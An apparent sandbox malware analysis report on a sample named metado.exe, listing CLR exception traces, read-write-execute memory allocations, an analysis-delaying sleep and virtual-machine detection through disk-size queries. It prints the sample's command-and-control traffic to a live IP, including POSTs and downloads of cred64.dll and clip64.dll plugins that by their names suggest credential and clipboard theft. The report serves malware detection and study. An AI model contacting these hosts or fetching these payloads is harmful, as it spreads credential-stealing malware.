RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53c5f23 registers.esp: 3664712 registers.edi: 3665012 registers.eax: 0 registers.ebp: 3664720 registers.edx: 0 registers.ebx: 3666596 registers.esi: 39910292 registers.ecx: 39925180	1
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0x53c5ee0 0x53c6f03 0x53c69e8 0x53c1a85 0x53c0a67 0xb7f9ce 0xb77cbf 0xb725cd 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53c5f23 registers.esp: 3664712 registers.edi: 3665012 registers.eax: 0 registers.ebp: 3664720 registers.edx: 0 registers.ebx: 3666596 registers.esi: 39910292 registers.ecx: 41331128	1
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0x53c5ee0 0x53c6f03 0x53c69e8 0x53c1a85 0x53c0a67 0xb7f9ce 0xb77cbf 0xb725cd 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53c5f23 registers.esp: 3664712 registers.edi: 3665012 registers.eax: 0 registers.ebp: 3664720 registers.edx: 0 registers.ebx: 3666596 registers.esi: 39910292 registers.ecx: 42724528	1
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0x53c5ee0 0x53c7395 0x53c7040 0x53c1a6d 0x53c0b54 0xb7f9ce 0xb77cbf 0xb725cd 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53c5f23 registers.esp: 3664796 registers.edi: 3665012 registers.eax: 0 registers.ebp: 3664804 registers.edx: 0 registers.ebx: 3666596 registers.esi: 39910292 registers.ecx: 39925292	1
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0x53c5ee0 0x53c7395 0x53c7040 0x53c1a85 0x53c0b54 0xb7f9ce 0xb77cbf 0xb725cd 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53c5f23 registers.esp: 3664796 registers.edi: 3665012 registers.eax: 0 registers.ebp: 3664804 registers.edx: 0 registers.ebx: 3666596 registers.esi: 39909856 registers.ecx: 41333624	1
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0x53c5ee0 0x53c7395 0x53c7040 0x53c1a85 0x53c0b54 0xb7f9ce 0xb77cbf 0xb725cd 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53c5f23 registers.esp: 3664796 registers.edi: 3665012 registers.eax: 0 registers.ebp: 3664804 registers.edx: 0 registers.ebx: 3666596 registers.esi: 39909856 registers.ecx: 42729432	1
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0x53c5ee0 0x53c82c3 0x53c7b1a 0xb7f9fc 0xb77cbf 0xb725cd 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53c5f23 registers.esp: 3665172 registers.edi: 3665388 registers.eax: 0 registers.ebp: 3665180 registers.edx: 0 registers.ebx: 3666596 registers.esi: 43280580 registers.ecx: 43287556	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://77.91.68.62/wings/game/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.62/wings/game/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.62/wings/game/Plugins/clip64.dll

Performs some HTTP requests (3 events)

request	POST http://77.91.68.62/wings/game/index.php
request	GET http://77.91.68.62/wings/game/Plugins/cred64.dll
request	GET http://77.91.68.62/wings/game/Plugins/clip64.dll

Sends data using the HTTP POST Method (1 event)

request

POST http://77.91.68.62/wings/game/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 102 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2260 stack_dep_bypass: 1 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0018f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ba0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73522000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f2b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ba0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e5a000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73dd1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c81000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6eeee000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ed6b000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c6f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a06000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a0a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a07000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a0b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a0c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a0d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x756e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 9:13 a.m.	process_identifier: 2328 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a08000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

metado.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (6 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW May 26, 2023, 9:13 a.m.	number_of_free_clusters: 2425790 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 26, 2023, 9:13 a.m.	number_of_free_clusters: 2425790 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 26, 2023, 9:13 a.m.	number_of_free_clusters: 2425596 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 26, 2023, 9:13 a.m.	number_of_free_clusters: 2425596 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
